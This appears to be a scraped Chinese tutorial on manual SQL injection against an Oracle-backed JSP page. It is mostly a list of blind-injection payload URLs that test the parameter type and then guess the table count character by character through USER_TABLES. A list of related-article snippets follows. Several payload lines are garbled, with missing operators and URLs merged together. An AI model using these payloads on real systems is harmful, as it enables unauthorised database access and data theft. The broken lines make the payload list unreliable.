手工注射JSP的代码

1、 判断注入类型(数字型还是字符型)

字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)

/index_kaoyan_view.jsp?id=117 And user>char(0)
/index_kaoyan_view.jsp?id=117 And user
/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1
/index_kaoyan_view.jsp?id=117 And userchar(0) And %25=
/index_kaoyan_view.jsp?id=117 And userchar(0) And ( )=(
/index_kaoyan_view.jsp?id=117) And user/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
/index_kaoyan_view.jsp?id=117 And str(98)
/index_kaoyan_view.jsp?id=117 And str(98)>str(97) And 1=1
/index_kaoyan_view.jsp?id=117 And str(98)str(97) And %25=
/index_kaoyan_view.jsp?id=117 And user
/index_kaoyan_view.jsp?id=117 And str(98)str(97) And ( )=(
/index_kaoyan_view.jsp?id=117) And str(98)
出现正常的页面:
/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
/index_kaoyan_view.jsp?id=117 And USER
 
2、 猜解表数量和表名
数据库数量为3:
/index_kaoyan_view.jsp?id=117">
/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And 
3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)
/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)
 
以下为猜解数据表数量
数据表第一位为:1
/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
 
数据表第二位为:3
/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
 
数据表第三位为:1

/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

时间: 2024-09-22 07:32:44

手工注射JSP的代码的相关文章

手工注射JSP学习_漏洞研究

1. 判断注入类型(数字型还是字符型)  字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)  http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)  http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)  http://www.test.net/index_kaoyan_view.jsp?id=117' A

jsp 分页程序代码

jsp 分页程序代码 <%  String s;  String theurl;  theurl="products.jsp?";  s=request.getParameter("s");  if(s!=null){   s=new String(request.getParameter("s").getBytes("iso-8859-1"));   theurl="products.jsp?s="

jsp数据更新代码

jsp数据更新代码 <script language="javascript"> function form1_onsubmit() {  if (document.form1.SiteName.value=="")     {       window.alert("请输入站点名称");       return false;      } } // 修改编辑栏高度 function Textarea_Size(num,objnam

用MyEclipse开发的Hibernate + JSP分页代码

下载后导入项目到 MyEclipse , 然后修改数据库连接参数即可测试. 我这用 的是 MySQL 数据库. 用 JSP 是因为 Hibernate 可以配合各种框架, 因此在代 码里我已经尽量的把页面和后台的直接变量耦合分隔开了. 部分代码显示: 相关 SQL: CREATE TABLE `user` ( `id` int(11) NOT NULL, `username` varchar(200) NOT NULL, `password` varchar(20) NOT NULL, `age

手工注射php学习_漏洞研究

代码:  $conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);  $password = md5($password);  $q = "select id,group_id from $user_table where username='$username' and password='$password'";  $res = sql_query($q,$conn);  $row = sql_fetch_row($res); 

GWT 的页面嵌入jsp/xml代码

问题描述 希望找到一种办法,用frame或其他办法在gwt页面中嵌入一段JSP代码.而且,这段代码不存在于本地文档中,是随机生成并保存在一个String变量里的.谢谢!具体原因如下:是这,上头交给我一个类,用来实现与银行进行信息交互的,但是这个类只有一个硕大的方法...返回一个更硕大的结果,这个结果是一个很完整的JSP页面.我一开始是打算自己写一个方法来实现这个类的功能,但是这个类内嵌着一个不可读的信息加密方法,而且还涉及到与验证码等等问题,所以就放弃了.由于这个类是在gwt的服务器端(serv

jsp验证码代码(1/4)

jsp教程验证码代码 <%@ page contenttype="image/jpeg" import="java.awt.*,java.awt.image.*,java.util.*,javax.imageio.*" %>     <%!     color getrandcolor(int fc,int bc){//给定范围获得随机颜色             random random = new random();            

jsp计数器代码

js|计数器 <!-- JSP-Hitcounter counts sessions. Copyright (C) 2000 Jesper Schmitz Mouridsen. Visit www.webappcabaret/jsm2/webapps.jsp?find=jsphcs for more info. This program is free software; you can redistribute it and/or modify it under the terms of th

高效简单的jsp分页代码

<%@ page import="java.sql.*,java.io.*,java.util.*" %> <%@ page language="java" pageEncoding="Big5" %> <%! String au_id,au_lname,au_fname,phone,address,city,state;%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD